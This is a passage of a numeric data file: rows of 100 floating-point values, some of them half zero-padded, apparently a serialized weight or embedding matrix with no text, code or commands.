0.0876284, 2.91228, 0.00152962, -0.226068, 0.944708, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0603471, 0.884705, 2.42111, 0.270771, 0.00966464, -0.0611919, 0.596101, 0.155451, 2.2376, -0.133937, 0.012803, -0.461751, -0.265171, -0.113588, -0.0241218, 0.23832, -0.18562, -0.131358, -0.153198, 0.280668, -0.123442, 0.00403498, 0.15714, 0.0275949, 1.07377, -0.286675, -0.23692, -0.155615, -0.465769, 2.37829, 0.216574, 0.0867811, 0.0479979, 0.0344449, 0.0605079, -0.596257, 0.545714, 0.307647, 0.0465394, -1.01244, 0.161261, -0.0496996, 0.149079, -0.0379314, 0.0885242, -0.155845, 0.124564, 0.00962962, 0.425885, -0.1531, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0], [-0.109546, -0.687897, 0.415421, -0.216894, 0.128069, 0.183706, 0.205175, 0.0265236, -0.0508679, -0.0169715, -0.13148, 0.0801082, -0.0169388, 0.132084, 0.016313, 0.0337704, 0.0629529, 0.136747, 0.105605, -0.626045, 0.0660877, 0.114989, 0.197466, 0.163532, -0.131197, 0.0944511, -0.131388, -0.191837, 0.0961356, 0.0892717, -1.9684, -0.113729, 0.0805298, 0.0406929, 0.0469088, -0.70717, -0.300784, -0.00430995, -0.0148604, 0.0580635, 0.234681, 0.0253711, -0.129839, 0.238674, 0.274998, 0.188001, -0.0525955, -0.00458653, -0.0746666, 0.0963384, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.418294, -1.40829, -2.72308, -0.236537, -0.269111, 0.390895, -0.249988, 1.0942, -4.78285, -0.356567, 0.050688, 0.171199, -0.187532, -0.0608907, 0.0397453, -0.169937, 0.363912, 0.277519, 0.818219, 0.548657, 0.363706, -0.163131, 0.373368, 0.206227, -0.38568, 0.636599, 0.192114, -0.0662641, -0.718695, -2.0209, 0.215237, 0.199808, -0.400015, 0.175947, 0.17355, -0.0503755, -0.70112, 0.347612, 0.359963, -3.57123, 0.227674, -0.4368, -0.039812, 0.315058, -0.472108, 0.622114, -0.568403, -0.0413331, 0.114776, 0.142896, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.233909, -0.242613, -0.0361945, 0.284611, 0.236274, 0.674884, 0.611067, 1.02005, -0.503001, 0.619844, -0.461034, 0.893672, -0.727651, 0.241604, 0.0508817, 0.338783, -0.913141, -0.376204, -1.35445, -0.710616, -1.16109, -0.25656, -0.117938, 0.24832, -0.994423, -1.35811, 0.637893, -0.0321529, -2.85521, 0.458857, 0.468812, -0.589555, 0.308018, 0.0244781, 0.160839, 0.416378, -1.95768, -1.08449, 0.457028, -0.885686, -0.890147, 
-10.6989, 0.181482, -2.6592, -1.39695, -2.62168, -0.583579, -0.0408955, -1.33666, -0.331785, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.19239, -0.879008, 1.01191, -0.231684, -0.015137, -0.305066, -0.884859, -0.264138, 2.70586, -0.192166, -0.0542771, -0.302712, 0.431669, 0.500803, 0.00558784, -0.0634604, 0.458905, -0.161579, -0.235579, -0.724697, -0.111262, 0.0244568, 0.630016, 0.33828, 0.828814, -0.0349925, -0.0919217, -0.0546509, -2.37028, 1.89336, -0.0775442, -0.0491432, -1.24378, 0.204948, 0.0713037, 0.123239, 0.913009, 0.594945, -0.224259, -1.03031, -1.6376, 2.31807, 0.180508, 0.0163787, 0.142455, -0.636434, 0.48348, 0.0402966, -0.291227, 0.876066, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1694, -1.03, 0.5938, -0.3384, 0.2092, 0.2175, 0.2827, 0.1641, 0.847, -0.7095, 0.3557, 0.008514, 0.2302, 0.6133, -0.002104, -0.0725, 0.1295, -0.1635, -0.0986, -0.605, -0.1353, -0.4526, 0.4468, -0.4412, -0.02974, 0.204, 0.0839, -0.535, 0.732, -1.131, -0.1063, 0.165, -0.00496, -0.2052, 0.02528, -0.51, -0.1176, -0.01218, 0.08527, -0.84, 0.177, 0.592, -0.445, 0.727, 0.4731, -0.578, 0.09357, -0.01588, 0.2712, 0.6606], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1436, 0.1572, 2.1, 0.2917, -0.6465, -0.2045, 1.704, -0.09094, 2.713, -0.3738, 0.778, -0.0737, 0.3477, -0.2788, 0.0363, -0.2053, -2.195, -0.4368, 1.333, 0.4792, -2.03, -0.598, -0.2935, -0.3596, -2.79, -2.066, -0.5864, -0.3882, -0.1605, -5.223, -0.0545, 0.0295, -0.0245, -0.917, 0.5312, 0.6313, 2.125, 0.7764, 0.3367, 0.8994, 1.062, 1.102, 1.541, 2.059, 1.534, -0.1753, 0.09656, -0.00813, -0.1935, -0.996], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0012, -0.2546, 0.2028, -0.03143, -0.1406, 0.49, -0.1117, 0.516, 0.1631, 0.317, -0.2108, -0.1576, -0.0945, -0.34, 0.03137, 0.04404, 0.05426, 0.0656, 0.414, -0.172, -0.12463, 0.0786, -0.09735, 0.06143, -0.1829, -0.258, -0.09534, -0.0712, 0.276, -5.66, -2.61, 0.07263, -0.0692, -0.10254, 0.1156, -0.2124, -0.3662, -0.009094, -0.1335, -0.1119, 0.04703, 0.224, -0.1334, 0.1566, 0.4001, 0.0484, -0.3052, 0.002058, -0.1948, -0.7197], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5127, -1.555, 3.809, -0.6694, -0.595, -3.354, -0.9517, -2.334, 6.156, 0.01255, 0.623, -1.9, 0.6387, -3.332, -0.0312, -0.3242, -2.49, 0.862, -1.338, -4.227, -0.8477, -0.1059, -0.33, 1.7705, 2.705, 1.431, -1.208, -0.2311, -1.138, 9.47, -0.672, 0.004467, -0.1378, -0.5938, -0.4226, -1.767, 1.66, 0.7554, 2.102, -1.276, 1.588, -2.781, 0.3618, -2.002, -0.779, 1.236, 0.7886, 0.03864, -0.2036, -2.717], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1562, 0.113, -2.695, -0.0929, -0.11426, -2.395, -0.0322, 0.3528, -0.2218, -0.02086, -0.394, -0.09924, 0.09125, -0.2172, -0.01674, -0.1992, -0.031, 0.1678, 0.02995, 0.2822, -0.8867, -0.0472, 0.0112, 0.726, 0.1853, 0.11945, 0.01122, -0.096, 0.2191, 0.321, -0.06088, -0.3591, 0.10065, -0.171, 0.01216, 0.329, -1.371, 0.507, 0.02184, 0.3474, -0.3667, 0.1842, -0.09863, -0.1148, -0.341, -0.4128, -4.215, 0.02826, 0.362, -2.275], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.01811, -0.688, 0.3557, -0.1586, 0.03268, -0.7046, -0.07465, -0.1877, 0.3184, -0.4697, 0.02899, -0.1947, 0.3992, 0.1786, -0.01234, 0.08234, 0.11847, -0.598, -0.03583, 0.03583, 0.2433, -0.4336, 0.448, -0.04855, -0.1567, 0.1048, 0.142, -0.179, 0.623, -0.3718, 0.1635, -0.0923, -0.0567, -0.0822, 0.03284, -0.5015, 0.2032, -0.0963, 0.05737, -1.55, 0.2578, 0.2256, -0.2012, 0.3645, -0.00999, -0.986, 0.01828, -0.02368, -0.0723, 0.447], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.74, -0.3972, 1.798, 0.0997, -0.1427, -0.5474, 0.02008, 0.394, 0.2366, -0.011665, 0.0521, -0.4521, -0.822, -0.007595, 0.00402, -0.0667, -0.004242, 0.2087, -0.02348, 0.0769, -0.13, -0.00989, 0.04855, 0.04715, 0.921, 0.004894, 0.02184, 0.04065, -0.2454, 2.547, -0.01274, 1.201, -0.3755, -0.1048, -0.0711, -0.3916, 0.3096, 0.0963, -0.508, 0.5366, 0.0607, 0.03467, 0.733, -0.1261, -0.1334, -0.07544, 0.3767, -0.007774, 0.2255, -0.735], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -2.031, -0.1558, -0.2489, -0.1857, 0.4028, -0.03906, -0.2815, 0.684, 1.059, -0.579, 0.2185, -0.2423, 0.981, -0.776, -0.01279, 0.1893, -0.6235, -0.718, -0.607, 2.18, -0.10126, -0.6064, 0.737, -0.3918, 0.7275, -0.588, -0.8345, -0.4736, 0.2512, 2.236, 0.579, 0.5884, 0.3506, -0.8643, 0.3784, -0.929, 0.0985, 0.02686, -0.1093, -2.037, -0.2107, 0.347, -0.12006, -1.049, 0.2764, -1.705, 0.06198, -0.01701, -0.03378, 0.4531], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1345, -1.45, 0.2927, -0.1875, -0.0232, -4.88, -0.1663, -0.8325, 0.6294, -0.2144, -2.328, 0.00883, 0.5083, -0.2079, 0.006733, -0.2983, 0.1516, 0.03848, -0.01481, 0.522, 0.03464, 0.0873, -0.2947, 0.567, 1.136, 0.2118, -0.4182, 0.4287, -0.3293, 2.61, -1.129, -0.45, -0.7646, -0.002655, -0.0321, 1.381, -2.457, 0.06158, -0.7744, -0.6665, 0.396, 0.1708, -0.2035, 0.0846, 0.4783, 0.0936, 0.02133, 0.0103, 0.5757, -0.0448], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.2213, -0.4622, -1.046, -0.0847, -0.0863, -0.6655, 0.0081, -0.04758, 1.68, -0.0881, 0.2769, -0.3052, -0.10645, -0.02095, -0.02211, -0.03925, 0.01566, -0.0884, -0.2654, 0.4954, 0.01588, -0.0314, 0.001894, 0.2014, 0.428, 0.0009522, -0.03262, -0.03287, -0.3113, 0.836, 0.03848, 0.1469, -0.2744, -0.05612, 0.1101, 0.3933, -0.3975, -0.2905, 0.128, -0.848, -0.1539, 0.0874, 0.1632, -0.0561, 0.1959, 0.078, 0.2505, -0.02383, 0.0884, -0.06058], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3838, 0.2006, -0.1642, -0.12146, 0.004738, -0.725, 0.0675, -0.19, -0.0638, 0.1569, 0.012566, 0.467, 0.1498, 0.05362, -0.017, -0.0708, 0.0957, 0.0233, 0.403, -0.271, 0.03372, 0.147, -0.024, 0.1649, -0.6084, 0.2117, 0.564, 0.06696, 0.3945, -0.1282, -0.1449, -0.2054, -0.06097, 0.0378, 0.08044, 0.3315, -0.4463, -0.161, 0.0678, 0.2068, -0.03604, 0.02005, -0.4434, 0.1511, 0.0418, 0.166, -0.4492, -0.03915, -0.01478, 0.04803], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.404, -0.04193, 1.418, -0.765, -2.322, 0.612, 1.072, 0.6533, 0.1669, -0.487, -0.3237, -0.5293, -0.1656, 0.0008044, 0.03333, -0.1257, -0.635, -0.3716, 0.2644, 0.683, -0.2279, 0.1151, -0.045, 0.2234, 0.651, 0.1284, -0.03372, -0.59, 0.333, -1.617, 0.6533, -0.02539, 0.1305, -0.399, -0.089, 0.1768, 0.2832, -0.0913, -0.291, -1.134, 0.03946, 0.1874, 1.293, -1.288, -0.912, 0.394, 0.794, -0.02904, 0.391, 0.176], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.259, 0.9536, 0.359, -0.1282, -0.193, -1.101, 0.671, -1.449, -0.449, 0.11163, 0.4211, 1.454, -0.292, -1.473, 0.006615, -0.1126, -0.6694, 0.1055, -0.4246, 1.98, -1.366, -3.412, 0.3887, 0.3555, 0.3525, -0.7656, 0.518, -0.05896, -0.544, 0.0807, 0.3464, 0.4214, -0.1326, -1.232, -1.307, -0.2134, 0.7275, 0.0965, -1.1455, 2.127, 0.9097, 0.7764, 1.376, -0.4, 0.2365, -0.04486, 0.9253, -0.00969, 0.098, -3.746], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1444, 0.9443, -6.523, -0.1407, -0.7715, 0.3613, -0.3298, -1.096, -3.531, -1.624, 5.48, -0.491, 0.1609, -1.339, -0.03616, 0.308, -0.3884, -4.445, -0.08154, 2.537, -1.547, 0.9126, -0.2517, 3.08, -2.832, -5.13, 1.787, -0.7803, 3.467, 0.1228, 0.789, -1.21, -0.426, 0.2961, 0.2231, -1.072, -2.486, 2.047, 0.9404, 0.4192, -2.84, 3.348, 0.8726, -5.29, 2.404, -0.9644, -8.4, -0.0394, -4.035, -3.316], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.217, 0.4316, 0.101, 0.677, -0.2393, -0.644, 0.4521, 0.1492, 0.575, 0.5396, -1.142, -0.0389, 0.4172, -2.52, 0.0329, -0.1294, -6.2, 0.5566, -3.084, -0.4744, -0.5786, -0.0792, -1.551, 0.805, -0.3484, -0.5674, 0.01196, -0.0992, -1.731, 1.929, -0.2255, -0.1646, -0.0873, -0.2018, -0.05966, 0.4192, -0.3245, 0.7837, -0.1709, -0.1466, 0.3152, -0.1924, 0.45, -1.289, -1.843, 0.3235, 0.0855, 0.03017, 0.2559, -2.365], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0652, 0.1316, 0.4553, -0.2382, -0.1658, 0.59, 0.1652, 0.2241, -0.0584, -0.1459, -0.1744, -0.2139, -0.08594, -0.06525, -0.003769, -0.0918, -0.0689, 0.03415, -0.1527, 0.4773, 0.08374, 0.0368, -0.07263, 0.0753, 0.1711, 0.005497, -0.2335, -0.12, -0.0685, -12.836, -0.8804, -0.1637, 0.03934, -0.1818, -0.0817, -0.2559, -0.2188, -0.2966, 0.228, -0.3892, 0.03876, 0.1559, -0.1113, 0.0887, 0.0901, 0.002272, 0.03506, 0.0261, 0.382, 0.2244], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.468, -0.2856, -1.41, -1.451, -5.94, 1.388, -0.731, 0.884, -0.8184, -0.2512, 1.523, -0.854, 0.2496, -0.09784, 0.01634, -0.05917, 0.02083, -3.04, -0.00947, 1.327, -1.991, -0.3855, -0.01095, -0.666, -1.026, 0.0678, -0.2551, -0.2083, 0.5693, 0.0506, 0.0719, 0.2024, -0.1389, -0.3398, 0.08777, 0.545, -1.296, -0.76, -0.7974, -1.092, -1.323, 0.9536, -0.3257, 1.355, 0.649, -2.729, 0.5776, -0.03583, 0.5703, -0.3855], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.283, 1.681, 1.076, -0.621, 0.0435, 0.2966, 1.204, -0.2445, 0.9683, -0.1262, 1.028, 0.749, -1.605, -0.3154, -0.03123, -0.1398, 0.11743, 0.1366, 0.0987, 1.658, 0.3718, -0.3513, -0.0299, -0.2288, -0.408, 0.0793, -0.1915, -0.341, 0.777, 0.793, -1.126, 0.2861, -0.6597, 0.1995, 0.113, -0.501, -0.4814, 1.098, 0.01782, 0.437, -0.03934, -0.2213, 0.565, -0.0698, -0.1749, 0.214, 0.3464, -0.04623, -0.3735, -0.3787], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.02821, 0.6553, -1.925, -4.43, -3.766, 1.634, -0.5127, 0.56, -0.4368, 0.2837, -0.04706, -8.91, -0.438, -0.01651, -0.01994, -0.2021, 0.115, 0.10266, 0.00821, -0.1527, 0.909, -0.02728, -4.96, 0.0435, 0.1056, -0.02876, 0.0718, -0.2449, -0.000863, -0.7393, 0.11957, -0.4678, -2.816, -0.08765, -0.00488, 0.6987, 0.928, -1.059, 0.1455, 1.043, -0.04678, -1.13, 0.725, 1.469, -5.914, -0.0759, -1.922, -0.00736, -0.1659, -3.822], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2421, -0.01435, 0.829, -0.9624, 0.05988, 0.004295, 0.2957, 0.1569, 0.1038, -0.2556, -0.431, 0.04742, -0.7427, -0.006886, 0.00225, -0.11053, -0.711, 0.07874, 0.1509, 0.007904, -0.1338, 0.01569, -0.321, 0.4077, 0.4407, -1.042, -0.3755, -0.02628, 0.8174, -0.5073, -0.1229, -0.10535, 0.12146, -0.2394, -0.4268, 0.2754, 0.277, 0.11743, 0.10034, 0.2393, -0.0685, 0.2822, 0.7715, -0.7046, 0.2197, -0.3, 0.7915, 0.0347, 0.2693, -0.4287], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6846, -1.239, -0.267, 1.614, 0.1421, -0.921, -0.4517, -1.287, -1.088, 0.4763, 0.563, -1.354, -0.12036, -1.451, 0.01065, 0.05038, -3.22, 0.226, -1.326, -0.5996, -0.386, 0.3174, -0.694, 0.6284, 1.403, -0.7783, -0.862, 0.4128, -1.359, 0.99, -1.395, 0.3074, 0.1984, 0.4104, -0.3335, -1.095, 1.043, -0.8716, 0.2396, -4.31, -0.2556, -1.113, -0.5986, -0.9395, 0.1285, 0.6006, -0.771, 0.04688, 0.3994, -1.138], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1214, 0.08875, 0.03714, 0.1184, -0.1936, -0.485, -0.1667, -0.0867, 0.8896, -0.1371, 0.06024, -0.4348, 0.0403, -0.2054, 0.04868, -0.009186, -0.2363, -0.0637, 0.0847, -0.02806, -0.0873, 0.02519, -0.004154, -0.1091, 0.3213, -0.1721, -0.3025, 0.0504, 0.0394, -0.207, -0.0905, 0.2374, 0.04007, -0.2098, -0.06198, -0.218, 0.1278, 0.11285, 0.001713, -0.11847, -0.0661, 0.02953, 0.456, -0.2964, -0.1829, -0.003365, 0.1837, 0.03934, 0.1737, 0.08673], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
